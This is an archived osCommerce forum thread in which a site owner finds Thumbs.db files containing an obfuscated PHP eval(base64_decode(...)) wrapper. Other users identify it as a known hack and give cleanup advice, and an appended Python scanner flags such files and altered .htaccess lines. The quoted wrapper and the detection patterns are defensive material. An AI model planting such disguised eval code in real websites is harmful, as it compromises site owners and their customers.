Plux Posted May 4, 2011

Are there any files that come with osCommerce called Thumbs.db in a clean installation?

Guest Posted May 4, 2011

Ruud,

No, there are not.

Chris

Plux (Author) Posted May 4, 2011

> Ruud, No, there are not. Chris

Where do these come from then (btw. it was oscMAX2.0)? I read that they were special oscommerce database files or something like that. They contain code like

ÐÏࡱ

and

<?php @eval(base64_decode("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")); ?>

clumberman Posted May 4, 2011

> Are there any files that come with osCommerce called Thumbs.db in a clean installation?

They are generated by Windows, but related to ThumbsPlus thumbnail program. Check www.cerious.com for discussions relating to this file.

Plux (Author) Posted May 4, 2011

> They are generated by Windows, but related to ThumbsPlus thumbnail program. Check www.cerious.com for discussions relating to this file.

So none of them should be in an osCMAX2.0 website I presume? I tried deleting one but then I got a fatal error visiting the admin panel. However, besides saying error nothing worked out of the ordinary. And why is the file so heavily encrypted?

germ Posted May 4, 2011

I'd bet a pickled buffalo tongue that if you look closer the last file you posted is really named Thumbs.db.php, a known hack file.

And hey, what a coincidence, what you posted sure looks like hack code to me... :blush:

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me -

Guest Posted May 4, 2011

> I'd bet a pickled buffalo tongue...

hate to lose that in a bet...... <_<

Chris

NodsDorf Posted May 4, 2011

http://www.oscommerce.com/forums/topic/374682-weird-files/

You need to either manually remove the malicious code on your site or go to a backup prior to April 23rd (most likely the time of attack).

Files that were likely infected:
Numerous .php files
Numerous .htm or html files

Had you done this when you first posted the topic, your host would probably have had a backup, if you didn't, that they could help you with.

You then need to update your FTP program and change all passwords used with it.

Additionally read the how to secure your site thread here: http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-oscommerce-22-site/

I'm not sure how this works in oscMax but it's a good starting point nonetheless.

NodsDorf Posted May 4, 2011

Also I have seen this attack include database entries.

jow ga Posted May 9, 2011

I have this same attack on one of my sites. They also update the .htaccess file to recognize the thumbs.db, so deleting the thumbs.db is not enough; you have to scroll down to the very bottom of the .htaccess file and delete the added line.

tom

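A cleanup check for the two symptoms reported in this thread, added here as an example and not posted by any participant: it walks a web root, flags Thumbs.db-named files that carry PHP eval(base64_decode( code or are not plain thumbnail caches, and flags .htaccess lines that mention thumbs.db. The function names, the sample files and the placeholder .htaccess directive are constructed for illustration.

```python
import os
import re
import tempfile

# First bytes of a genuine Windows thumbnail cache (OLE2 compound file).
OLE_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")
# PHP open tag followed closely by eval(base64_decode( as in the posted snippet.
PHP_EVAL = re.compile(rb"<\?php.{0,200}?eval\s*\(\s*base64_decode\s*\(", re.I | re.S)
THUMBS_REF = re.compile(r"thumbs\.db", re.I)

def scan(webroot):
    """Return sorted (reason, relative_path, line_number) findings under webroot."""
    findings = []
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, webroot).replace(os.sep, "/")
            lower = name.lower()
            if lower == ".htaccess":
                with open(path, encoding="utf-8", errors="replace") as fh:
                    for lineno, line in enumerate(fh, 1):
                        if THUMBS_REF.search(line):
                            findings.append(("htaccess-mentions-thumbs.db", rel, lineno))
            elif lower.startswith("thumbs.db"):
                with open(path, "rb") as fh:
                    data = fh.read()
                if PHP_EVAL.search(data):
                    # An OLE header does not clear the file: content is checked first.
                    findings.append(("php-eval-in-thumbs-file", rel, 0))
                elif lower != "thumbs.db" or not data.startswith(OLE_MAGIC):
                    findings.append(("thumbs-name-not-a-thumbnail-cache", rel, 0))
    return sorted(findings)

def build_sample_tree(root):
    """Write constructed sample files (not taken from any real site)."""
    os.makedirs(os.path.join(root, "images"))
    os.makedirs(os.path.join(root, "admin"))
    samples = {
        "images/Thumbs.db": OLE_MAGIC + b"\x00" * 64,  # plain cache: no finding
        "admin/Thumbs.db.php": OLE_MAGIC + b'<?php @eval(base64_decode("AAAA")); ?>',
        "admin/thumbs.db": b"not an OLE file",
        # Placeholder directive: the thread does not show the real added line.
        ".htaccess": b"Options -Indexes\nPLACEHOLDER-DIRECTIVE Thumbs.db\n",
    }
    for rel, content in samples.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(content)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for finding in scan(tmp):
            print(finding)
```

A file that starts with the thumbnail-cache header is still reported when PHP code follows it, which matches the file contents posted earlier in the thread.
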
This topic is now archived and is closed to further replies.